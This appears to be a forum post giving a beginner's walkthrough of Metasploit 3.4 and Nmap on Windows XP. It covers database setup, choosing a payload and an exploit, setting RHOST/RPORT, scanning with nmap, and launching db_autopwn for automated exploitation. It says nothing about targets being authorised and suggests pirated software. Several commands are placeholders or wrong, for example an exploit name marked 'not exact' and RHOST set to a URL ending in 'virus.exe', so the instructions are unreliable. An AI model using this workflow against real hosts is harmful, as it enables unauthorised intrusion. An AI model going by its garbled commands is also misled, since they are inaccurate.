So what you need to do it:
System lower than VISTA or any *nix. If you have no one, just like me, i suggest you to download VMWare and WinXP VMImage (thepiratebay.org). Also there are a Backtrack nix system, which as i heard VERY powerful and have such tools already inbuilt. But backtrack is the first nix i ever tried to used, it is totally CMD only, so i dont even know any commands and stuff, ive gave it up after 10 minutes.
WinPCap. Thats the main reason why you have to use anything expect VISTA or 7 - winpcap aint working on those systems.
Metasploit&NMap. Metasploit - powerful self-explanotory exploiting tool. NMap - powerful port scanner.
Because i have no Backtrack or nix, i will explain you stuff for WinXP.
After installing metasploit(NMap included to installer), do not launch metasploit itself(Well,you can but then you will spend your time for great justice and happy future of humanity), launch the update first. You will see some shit like "Configuring multi-user permissions", this may take 4-6 minutes, but this shit happens only at first launch.
After update completed, wait till Update windows closed and then open then metasploit console itself. Wait a little bit again, and then the windows is booted up, write in:
Code: Select all
db_create
Then we need to connect to this db, write down:
Code: Select all
db_connect
Code: Select all
Set - set someting
Show - show something
Use - use something(Exploit or Payload)
Search - search in exploits by name and description
Exploit\Run - Run exploit
Check - check exploit
First, we need to set the payload:
Set Payload http/appache_chunk (not exact, just example)
and then we need to set the exploit itself
use http/appache_chunk/blahdoh
and run the exploit
Exploit\Run (but sometimes it is also requires to connect)
Well, for example we have working exploit, but what it do? How this works and so on?
After we set exploit and payload, we will write:
Code: Select all
show info
Code: Select all
show options
Code: Select all
set RHOST http://sethioz.com/virus.exe
set RPORT 80
It was the main part, now the easiest. Metasploit 3.4 have db_autopwn.
First, run CMD. Write in
Code: Select all
ping IP
If pockets are recieved, then go on.
In metasploit, write again db_create , db_connect.
Now the part wheres NMap comes in use:
Code: Select all
nmap -sT -sV IP
Next, write down:
Code: Select all
db_autopwn -p -t -e
UPD: Damn, NMap sucks a lot. Its gives you WRONG info. Use Blue"s Port Scanner to find out opened ports on IP and Acunetix Web Scanner to detect OS. Then, use the Search thing.